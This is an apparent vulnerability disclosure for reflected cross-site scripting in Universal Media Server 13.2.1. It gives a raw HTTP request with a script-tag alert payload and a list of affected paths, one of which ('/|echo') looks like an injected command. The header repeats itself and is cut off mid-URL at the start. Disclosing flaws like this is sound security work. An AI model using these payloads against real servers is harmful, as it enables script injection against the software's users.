# Google Dork: NA
# Date: 01/04/2023
# Exploit Author: Yehia Elghaly - Mrvar0x
# Vendor Homepage: https://www.u # Exploit Title: Universal Media Server 13.2.1 Cross Site Scripting
# Google Dork: NA
# Date: 01/04/2023
# Exploit Author: Yehia Elghaly - Mrvar0x
# Vendor Homepage: https://www.universalmediaserver.com/
# Software Link: https://www.universalmediaserver.com/download/
# Version: 13.2.1
# Tested on: Windows 7 / 10
# CVE: N/A
Summary: Universal Media Server is a free DLNA, UPnP and HTTP/S Media Server.Support all major operating systems, with versions for Windows, Linux and macOS.
Description: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: Reflected XSS found on the follwoing paths
GET /%3Cscript%3Ealert('XSSYF')%3C/script%3E HTTP/1.1
Host: 172.16.110.132:9001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
[Affected Component]
/
/about
/accounts
/actions
/logs
/player
/settings
/shared
/v1/api/about
/|echo